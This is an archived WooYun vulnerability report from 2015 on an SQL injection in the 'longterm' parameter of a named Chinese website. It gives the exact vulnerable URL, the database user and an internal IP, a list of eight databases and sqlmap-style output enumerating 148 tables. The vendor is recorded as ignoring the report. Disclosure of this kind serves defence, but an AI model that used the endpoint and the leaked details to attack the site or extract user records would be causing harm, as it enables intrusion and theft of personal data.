当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124374

漏洞标题: 果粒网某处注入漏洞(涉及数十万用户信息,148张表)

相关厂商:果粒网

漏洞作者: 路人甲

提交时间:2015-07-04 21:58

修复时间:2015-08-18 22:00

公开时间:2015-08-18 22:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

官网:http://www.guoli.com/
注入地址:

http://www.guoli.com/renwen/index.php?&longterm=1&sp1=0
参数:longterm存在注入


150703_1.png


信息:

current user:    'adushi@172.16.3.100'


数据库:

current database:    'adushi'


数据库:

available databases [8]:
[*] adushi
[*] dedev5
[*] discuz
[*] guoli
[*] guolicuser
[*] information_schema
[*] uch
[*] yanqing


150703_2.png


表:

Database: adushi
[148 tables]
+-------------------------+
| `ads_class_ attribute` |
| ads_act_joinpep |
| ads_activity |
| ads_activity_list |
| ads_admin_group |
| ads_admin_groupmenu |
| ads_admin_member |
| ads_admin_membergroup |
| ads_admin_menu |
| ads_adphoto |
| ads_area |
| ads_area1 |
| ads_attachments |
| ads_attachtypes |
| ads_bottomcol |
| ads_buy_coding |
| ads_caches |
| ads_car_model |
| ads_car_modelprice |
| ads_car_trade |
| ads_car_type |
| ads_checkuse |
| ads_cityip |
| ads_credits_details |
| ads_deal_record |
| ads_defineclassify |
| ads_dict_list |
| ads_domain |
| ads_ecard_bind |
| ads_email_list |
| ads_employee |
| ads_employeeclass |
| ads_exper_sms |
| ads_help |
| ads_helpclass |
| ads_hotel_finance |
| ads_hotel_info |
| ads_leaveword |
| ads_line_website |
| ads_lwresponses |
| ads_member |
| ads_mobile_certify |
| ads_model_reg |
| ads_otherfavorite |
| ads_package_special |
| ads_pay_gathering |
| ads_pay_trade |
| ads_person_add |
| ads_person_interest |
| ads_product_favorite |
| ads_product_pic |
| ads_product_rdcmd |
| ads_product_rmdInfo |
| ads_productclass |
| ads_propose |
| ads_qq_session |
| ads_responses |
| ads_sale_special |
| ads_sales_comment |
| ads_search_vp |
| ads_searchresultlist |
| ads_shop |
| ads_shop_auditwrong |
| ads_shop_cdpic |
| ads_shop_certify |
| ads_shop_checkpeople |
| ads_shop_comment |
| ads_shop_comment_tmp |
| ads_shop_compare |
| ads_shop_eattrade |
| ads_shop_express |
| ads_shop_extend |
| ads_shop_favorite |
| ads_shop_fields |
| ads_shop_hotel |
| ads_shop_hotelprice |
| ads_shop_hoteltrade |
| ads_shop_industry |
| ads_shop_info |
| ads_shop_infothemes |
| ads_shop_invoice |
| ads_shop_links |
| ads_shop_pic_tmp |
| ads_shop_picthemes |
| ads_shop_product |
| ads_shop_productcomment |
| ads_shop_protection |
| ads_shop_ranking |
| ads_shop_recommend |
| ads_shop_returnmoney |
| ads_shop_sales |
| ads_shop_scenery |
| ads_shop_service |
| ads_shop_tell |
| ads_shop_theme |
| ads_shop_tmp |
| ads_shop_total_sub |
| ads_shop_trade |
| ads_shop_trade_product |
| ads_shop_tradereturn |
| ads_shop_vipcertify |
| ads_shop_viptry |
| ads_shopclass |
| ads_shopclassold |
| ads_specialinfo |
| ads_specialinfo_content |
| ads_survey_answer |
| ads_survey_question |
| ads_survey_result |
| ads_survey_subject |
| ads_tag |
| ads_taglist |
| ads_team_info |
| ads_tellfriend |
| ads_templet |
| ads_templet_content |
| ads_templet_value |
| ads_totalsearchresult |
| ads_user |
| ads_user_browse |
| ads_user_composite |
| ads_user_ecoupons |
| ads_user_feedback |
| ads_user_hotelperson |
| ads_user_integral |
| ads_user_integralwater |
| ads_user_invite |
| ads_user_pay |
| ads_user_recommend |
| ads_user_reply |
| ads_user_survey |
| ads_user_ticket |
| ads_user_ticketwater |
| ads_webtell |
| ads_words |
| data_do |
| hotel_day_count |
| hotel_info_20121213 |
| hotel_price_data |
| hotel_quote_report |
| hotel_room_dayprice |
| imp_hotel_p_dayprice |
| shop_data_contrast |
| temp |
| temp2 |
| tools_ctrip_hotelinfo |
| xc_city |
| xc_hotel_info |
+-------------------------+


150703_3.png


漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝